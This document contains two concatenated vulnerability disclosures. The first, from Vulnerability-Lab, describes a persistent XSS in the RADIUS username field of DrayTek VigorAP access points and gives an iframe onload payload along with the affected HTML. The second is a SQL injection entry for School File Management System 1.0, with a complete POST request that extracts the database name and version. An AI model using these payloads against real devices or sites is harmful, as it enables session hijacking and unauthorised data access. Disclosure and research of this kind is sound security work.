https://www.vulnerability-lab.com/get_content.php?id=2244

Common Vulnerability Scoring System:
====================================
4

Product & Service Introduction:
===============================
https://www.draytek.com/
https://www.draytek.com/products/vigorap-903/

Affected Product(s):
====================
Draytek
[+] VigorAP 1000C | 1.3.2
[+] VigorAP 700 | 1.11
[+] VigorAP 710 | 1.2.5
[+] VigorAP 800 | 1.1.4
[+] VigorAP 802 | 1.3.2
[+] VigorAP 810 | 1.2.5
[+] VigorAP 900 | 1.2.0
[+] VigorAP 902 | 1.2.5
[+] VigorAP 903 | 1.3.1
[+] VigorAP 910C | 1.2.5
[+] VigorAP 912C | 1.3.2
[+] VigorAP 918R Series | 1.3.2
[+] VigorAP 920R Series | 1.3.0
[+] All other VigorAP Series with Radius Module

Vulnerability Disclosure Timeline:
==================================
2020-05-07: Public Disclosure (Vulnerability Laboratory)

Technical Details & Description:
================================
A persistent input validation vulnerability has been discovered in the official Draytek VigorAP product series application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The persistent input validation web vulnerability is located in the username input field of the RADIUS Setting - RADIUS Server Configuration module. Remote attackers with limited access are able to inject their own malicious persistent script code as the username. Other privileged user accounts execute it on preview of the module's context. The request method to inject is POST and the attack vector is located on the application side.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Vulnerable Module(s):
[+] RADIUS Setting - RADIUS Server Configuration - Users Profile

Vulnerable Input(s):
[+] Username

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged user account and low user interaction. For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below to continue.

PoC: Payload
<iframe src=evil.source onload=alert(document.domain)></iframe>

PoC: Vulnerable Source (http://vigorAP.localhost:50902/home.asp)
<div class="box">
<table width="652" cellspacing="1" cellpadding="2">
<tbody><tr>
<th id="userName">Username</th>
<th id="passwd">Password</th>
<th id="confirmPasswd">Confirm Password</th>
<th id="configure">Configure</th>
</tr>
<tr>
<td><input maxlength="24" type="text" id="addusr"></td>
<td><input maxlength="24" type="password" id="addpwd"></td>
<td><input maxlength="24" type="password" id="addpwdcfm"></td>
<td><input type="button" id="btnAddUser" value="Add" class="add" onclick="addUser()">
<input type="button" id="btnCancelUser" value="Cancel" class="add" onclick="cancelUser()"></td>
</tr>
</tbody></table>
<table class="content" width="652" cellspacing="1" cellpadding="2">
<tbody id="usersTb">
<tr>
<th id="userNo">NO.</th>
<th id="userNames">Username</th>
<th id="userSelect">Select</th>
</tr>
<tr><td>1</td><td>test</td><td><input type="checkbox"><input type="hidden" value="test"></td></tr>
<tr><td>2</td><td><iframe src=evil.source onload=alert(document.domain)></iframe></td><td><input type="checkbox">
<input type="hidden" value="asd"></td></tr></tbody>
</table>
<p><input type="button" id="btnDelSelUser" value="Delete Selected" class="del" onclick="delSelUser()">
<input type="button" id="btnDelAllUser" value="Delete All" class="del" onclick="delAllUser()">
</p></div>

Reference(s):
http://vigorAP.localhost:50902/
http://vigorAP.localhost:50902/home.asp

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

--
VULNERABILITY LABORATORY - RESEARCH TEAM
-
School File Management System 1.0 - 'username' SQL Injection
# Exploit Title: School File Management System 1.0 - 'username' SQL Injection
# Date: 2020-05-04
# Exploit Author: Tarun Sehgal
# Vendor Homepage: https://www.sourcecodester.com/php/14155/school-file-management-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/school-file-management-system.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

---------------------------------------------------------------------------------
# Parameter Vulnerable: username

# Injected Request

POST /sfms/admin/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 173
Origin: http://localhost
Connection: close
Referer: http://localhost/sfms/admin/index.php
Cookie: PHPSESSID=084gi60nhgqp5lpba3q6qngk9g
Upgrade-Insecure-Requests: 1

username=admin' OR 1 GROUP BY CONCAT(database(),(SELECT (CASE WHEN (7665=7665) THEN 1 ELSE 0 END)),0x3a,0x3a,version(),FLOOR(RAND(0)*2)) HAVING MIN(0)#&password=admin&login=

// Comment: The request above will print the database name and the MariaDB version.